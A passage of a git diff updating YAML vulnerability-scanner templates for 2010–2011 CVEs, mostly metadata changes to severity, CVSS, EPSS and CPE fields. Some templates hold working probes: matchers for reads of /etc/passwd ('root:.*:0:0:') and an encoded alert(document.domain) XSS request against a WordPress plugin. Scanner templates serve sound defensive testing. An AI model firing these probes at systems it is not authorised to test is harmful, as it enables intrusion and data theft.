cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - tags: cve,cve2010,lfi,edb,packetstorm + epss-score: 0.04725 + epss-percentile: 0.9172 + cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: modx + product: modx_revolution + tags: cve,cve2010,lfi,edb,packetstorm http: - method: GET @@ -26,15 +34,16 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body -# Enhanced by mp on 2022/03/30 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d3bd584474eb7630e0258a8e8c13c0f2a93f33f43261e5b76e7f53fee7ddf3a5022100d2f9b8533fcb1885738f7a9b849509f2ab9b56e3eb8781af099b5918958da068:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 458b3fc4a9..0ab46c73d2 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -3,22 +3,26 @@ id: CVE-2010-5286 info: name: Joomla! Component Jstore - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - - http://web.archive.org/web/20210123122507/https://www.securityfocus.com/bid/44053/ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt - remediation: Upgrade to a supported version. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 cve-id: CVE-2010-5286 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + cwe-id: CWE-22 + epss-score: 0.04708 + epss-percentile: 0.91707 + cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joobi + product: com_jstore + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a00473045022100bc82fb30952a190b21630b4bc9489b0c7fab404a03b9db991d01036e511164ae02200593c8807d6e439aed7d30ab6c9644e24e27be7e52eb01c0e772680a4deb356f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index cf1c05c45d..2c5977dfe6 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -3,22 +3,28 @@ id: CVE-2011-0049 info: name: Majordomo2 - SMTP/HTTP Directory Traversal author: pikpikcu - severity: high + severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 - remediation: Upgrade to a supported version. + - http://securityreason.com/securityalert/8061 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - tags: cve,cve2011,majordomo2,lfi,edb + epss-score: 0.96615 + epss-percentile: 0.99495 + cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mj2 + product: majordomo_2 + tags: cve,cve2011,majordomo2,lfi,edb http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -37,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4b0a00483046022100d1094529f4a4cda1df50be625bd3c840201a53a474b6c54272261a92db7cc525022100e2a3e292f525bdfdd5841c31fe70a10f3704213d781b6f7055ba077f0d0b7c75:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index bed6ae5c84..fdd1ee30be 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -3,21 +3,26 @@ id: CVE-2011-1669 info: name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 - - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/ - http://www.exploit-db.com/exploits/17119 - remediation: Upgrade to a supported version. + - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-1669 cwe-id: CWE-22 + epss-score: 0.02966 + epss-percentile: 0.89746 + cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mikoviny + product: wp_custom_pages google-query: inurl:"/wp-content/plugins/wp-custom-pages/" tags: edb,cve,cve2011,wordpress,wp-plugin,lfi @@ -28,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -37,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 490a0046304402206af608bda114df5df16e17feddc480b495abc86bad6a5141eea53c1aa9bd4c1e0220386d6b6971baa02e9789c1515b6c28452f39e93349757b3f46e3c7e450a275b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 48c957281c..27a558407a 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -3,21 +3,29 @@ id: CVE-2011-2744 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + remediation: | + Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/35945 - http://www.openwall.com/lists/oss-security/2011/07/13/6 - https://nvd.nist.gov/vuln/detail/CVE-2011-2744 - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ + - http://securityreason.com/securityalert/8312 + - http://www.ocert.org/advisories/ocert-2011-001.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2011-2744 cwe-id: CWE-22 - tags: cve,cve2011,lfi,chyrp,edb + epss-score: 0.01541 + epss-percentile: 0.85684 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp,edb http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a0047304502202fa3b79c9addcc0668478ca38c01458f70450397a8bc72e9859fb7550ea6285c022100d1c1700002861acf7785f137ac8a8aaa1a577a0ce5ae1eef2dba0f3bf1065459:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 26f9ff1a8d..937f4f8e07 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -3,27 +3,29 @@ id: CVE-2011-2780 info: name: Chyrp 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 - http://www.ocert.org/advisories/ocert-2011-001.html - http://www.openwall.com/lists/oss-security/2011/07/13/6 - - http://web.archive.org/web/20210121214023/https://www.securityfocus.com/bid/48672/ - - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/ - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - - http://web.archive.org/web/20201207104106/https://www.securityfocus.com/archive/1/518890/100/0/threaded - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2011-2780 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2011,lfi,chyrp + epss-score: 0.03327 + epss-percentile: 0.90268 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chyrp + product: chyrp + tags: cve,cve2011,lfi,chyrp http: - method: GET @@ -32,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -41,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a0047304502202e1a191887e26490eb022cfd487dd69d4574311e4a7c38a40a139940738bdb8c02210083f08c9e4e12b83edf4978832e12e8decd761e995e953600d780f1b8162d1d3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index c92f5945db..b1955f25cb 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -5,19 +5,24 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36256 - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 - cvss-score: 7.8 - tags: cve,cve2011,lfi,cisco,edb + epss-score: 0.90502 + epss-percentile: 0.98473 + cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_ip_interactive_voice_response + tags: cve,cve2011,lfi,cisco,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a0047304502201fa7c97661c1b3597c2bf0752446827edb061f026a25017bd3555c93b8ca9222022100beb1ef9ed877112d771daca9cbb9aabc1cb5f2d1b5c00740788f9a7f0aaa13e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 385c2af2dc..34ceed0254 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -5,21 +5,23 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* epss-score: 0.00182 - tags: seclists,cve,cve2011,xss,tikiwiki + epss-percentile: 0.55336 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + tags: seclists,cve,cve2011,xss,tikiwiki http: - method: GET @@ -29,17 +31,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/02/18 + - type: status + status: + - 200 + +# digest: 4a0a004730450221009868bb1202e12707737a86b121d4b5b33f9603bf9fcbcd7b881de63a856e799002201c2feb421f81cc1068b74d81394b2568ee2ece6ea8bb5bd66ace044a01191f8a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index c43544de21..7b770f3ea7 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -5,40 +5,44 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 - - http://web.archive.org/web/20210121070605/https://www.securityfocus.com/archive/1/520589 - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities - remediation: Upgrade to a supported version. + - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/ + - http://www.openwall.com/lists/oss-security/2011/12/19/6 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 + epss-score: 0.00746 + epss-percentile: 0.7886 + cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 + vendor: simplerealtytheme + product: advanced_text_widget_plugin google-query: inurl:"/wp-content/plugins/advanced-text-widget" tags: cve,cve2011,wordpress,xss,wp-plugin http: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - raw: + - | + GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} - matchers-condition: and matchers: - - type: word - part: body - words: - - "" + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_1, "Advanced Text Widget")' + condition: and - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 +# digest: 4a0a00473045022100bf0b1725e6538090fa9e610d2c30c5ff41a5d513938c1d5ee5d95c5ad2d283c10220483d8d86973777832d83885b3dd6f0caf71aee694fa5ce76ed94e9b6237516d9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index f5dfc9ac7b..a67e9fa545 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -5,18 +5,25 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 - http://www.openwall.com/lists/oss-security/2011/12/23/2 - http://plugins.trac.wordpress.org/changeset/469785 - remediation: Upgrade to a supported version. + - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 + epss-score: 0.00301 + epss-percentile: 0.66122 + cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: codeasily + product: grand_flagallery + framework: wordpress google-query: inurl:"/wp-content/plugins/flash-album-gallery" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -28,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 490a004630440220421becd619a54e5a2b2b85b2ac42dc72c9325a00ac5bcfe9d672c47edba4c80c02202a7babff8fe0734808ebb24c36432ae9092545baf06e6246997ee1b31566e148:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 39acdf11e9..a09dce08ef 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -3,22 +3,26 @@ id: CVE-2011-4804 info: name: Joomla! Component com_kp - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36598 - - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/ - - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/ - https://nvd.nist.gov/vuln/detail/CVE-2011-4804 - remediation: Upgrade to a supported version. + - http://foobla.com/news/latest/obsuggest-1.8-security-release.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2011,joomla + epss-score: 0.0358 + epss-percentile: 0.90578 + cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: foobla + product: com_obsuggest + tags: lfi,edb,cve,cve2011,joomla http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4b0a0048304602210098f755eecb0c991ffd697980f76baf009619a46ea5dbea1df9399baa64a201e4022100cec896f587f8793556c18e47afe1505006a2df12ad5f3de0486831c21e824b48:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 2be013652f..7a0edc3900 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: | + Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 - http://www.openwall.com/lists/oss-security/2012/01/10/9 + - http://wordpress.org/extend/plugins/adminimize/changelog/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4926 cwe-id: CWE-79 + epss-score: 0.01001 + epss-percentile: 0.81956 + cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: bueltge + product: adminimize google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 490a0046304402203ca5db7989bbd28920ae2547c34c6c064ce9d12cc9b4887e1a799934f27d3fca022012abae00d56d637dda7a5c3469a1e1e2da527433170fd57b479981ecd45578a8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 1c859ca001..e7f93eaf3f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + remediation: | + Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5106 - https://wordpress.org/plugins/flexible-custom-post-type/#developers - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5106 cwe-id: CWE-79 + epss-score: 0.00434 + epss-percentile: 0.71771 + cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fractalia + product: flexible_custom_post_type google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -28,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 490a004630440220152affed81a1cea0e15a57b10458e1f4a9bde9edd01cb94337255009189839cf022008f2cdc5e24ab6b9a96da7ed4d1ceaaf636e4dd43698c8dd60d938210b4b21dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index d1f70fe39e..2da96ddcbd 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -5,18 +5,23 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + remediation: | + Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ - - http://web.archive.org/web/20210121220155/https://www.securityfocus.com/bid/50743/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 - - http://web.archive.org/web/20201208110708/https://www.securityfocus.com/archive/1/520590/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5107 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00214 + epss-percentile: 0.59242 + cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: alert_before_you_post google-query: inurl:"/wp-content/plugins/alert-before-your-post" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a0047304502210092a260fab913409a5f13ecc87e19da51b86b39511bfbf349083c6b70f469f735022031566c594211caf571d9972ee7a224c218cc4d6f908fda9e4e59a73c58065637:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 56b5b2e088..bb38f4288b 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -5,18 +5,23 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + remediation: | + Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - - http://web.archive.org/web/20210615122339/https://www.securityfocus.com/bid/50824 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 - - http://web.archive.org/web/20210614205347/https://www.securityfocus.com/archive/1/520662/100/0/threaded classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5179 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00214 + epss-percentile: 0.59242 + cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: skysa + product: skysa_app_bar_integration_plugin google-query: inurl:"/wp-content/plugins/skysa-official/" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a00483046022100859ebb452cf9ceb630d4c176fa323982367be9dd75fd1dad2f1687a608a18d5a022100ba0080f76fca7ff6f32842d17c28b96818ea8ababf74ada391b08e2c6d5b4e2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 8c3f7f5324..b1739a4868 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -5,17 +5,24 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + remediation: | + Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - - http://web.archive.org/web/20210123155244/https://www.securityfocus.com/bid/50778/ - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 + epss-score: 0.0023 + epss-percentile: 0.60959 + cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: clickdesk + product: clickdesk_live_support-live_chat_plugin google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 490a0046304402203cb8c3b4f554203d33a5f8fab089db937ffba0862139e503ac25b33cbff5e42b02201f0bd243c366437485f92b9a34d9c725567df026756003733d7efa96cf4f7344:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index e6242ec0da..09f851ee77 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -6,19 +6,26 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 